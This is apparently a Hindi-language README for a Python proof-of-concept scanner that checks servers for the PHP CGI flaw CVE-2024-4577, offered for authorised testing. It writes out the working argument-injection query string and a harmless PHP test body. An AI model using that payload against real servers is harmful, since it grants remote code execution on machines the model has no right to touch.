
Python PoC script CVE-2024-4577 PHP CGI कमजोरी का परीक्षण करने के लिए query-string injection और POST payload के माध्यम से, सर्वर की संवेदनशीलता का निर्धारण करते हुए।
यह Python स्क्रिप्ट PHP की नवीनतम भेद्यता CVE-2024-4577 का निदान करने के लिए एक सरल PoC (Proof of Concept) उपकरण है।
⚠️ यह उपकरण सुरक्षा निदान उद्देश्यों के लिए प्रदान किया गया है और इसका उपयोग केवल आपके स्वामित्व वाले सिस्टम या पूर्व अनुमति प्राप्त लक्ष्यों पर ही किया जाना चाहिए।
यह भेद्यता तब उत्पन्न होती है जब PHP विंडोज वातावरण में CGI मोड में चलता है, जहां मल्टीबाइट वर्ण बाईपास के माध्यम से मनमाना PHP सेटिंग्स इंजेक्ट की जा सकती हैं और कोड निष्पादन प्रेरित किया जा सकता है।
यह स्क्रिप्ट लक्ष्य URL पर क्वेरी स्ट्रिंग-आधारित बाईपास पेलोड और PHP कोड POST अनुरोध के रूप में भेजकर भेद्यता की जांच करती है।
python3 --version
pip install requests
python3 cve_2024_4577_test.py
उदाहरण इनपुट:
http://192.168.0.10/index.php
या केवल रूट पथ दर्ज करने पर स्वचालित रूप से संसाधित होता है
http://192.168.0.10
✅ [✅] भेद्य: सर्वर ने PHP कोड निष्पादित किया।
→ यह सर्वर भेद्य है।
✔️ [✔️] गैर-भेद्य या अवरुद्ध
→ प्रतिक्रिया प्राप्त हुई लेकिन भेद्यता उत्पन्न नहीं हुई।
❌ [❌] अनुरोध विफल: ...
→ कनेक्शन त्रुटि, टाइमआउट आदि के कारण परीक्षण विफल।
भेद्यता बाईपास स्ट्रिंग सम्मिलन:
?%ADd+allow_url_include=1+%ADd+auto_prepend_file=php://input
POST बॉडी में PHP कोड सम्मिलन:
<?php echo 'CVE-2024-4577-TEST'; ?>
यदि सर्वर इस कोड को निष्पादित करता है, तो प्रतिक्रिया में वह स्ट्रिंग शामिल होगी, जिससे पहचान संभव है।
यह स्क्रिप्ट केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान की गई है, और अनधिकृत सिस्टम को स्कैन करना या परीक्षण करना अवैध है। उपयोगकर्ता सभी जिम्मेदारी स्वयं वहन करता है।
| फ़ाइल नाम | विवरण |
|---|---|
cve_2024_4577_test.py | भेद्यता परीक्षण के लिए Python स्क्रिप्ट |
README.md | उपयोग और विवरण दस्तावेज़ (यह फ़ाइल) |
LICENSE.txt |
बग रिपोर्ट या सुझाव ईमेल या PR के माध्यम से भेजें।
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें। कॉपीराइट (c) 2025 KimJuhyeong95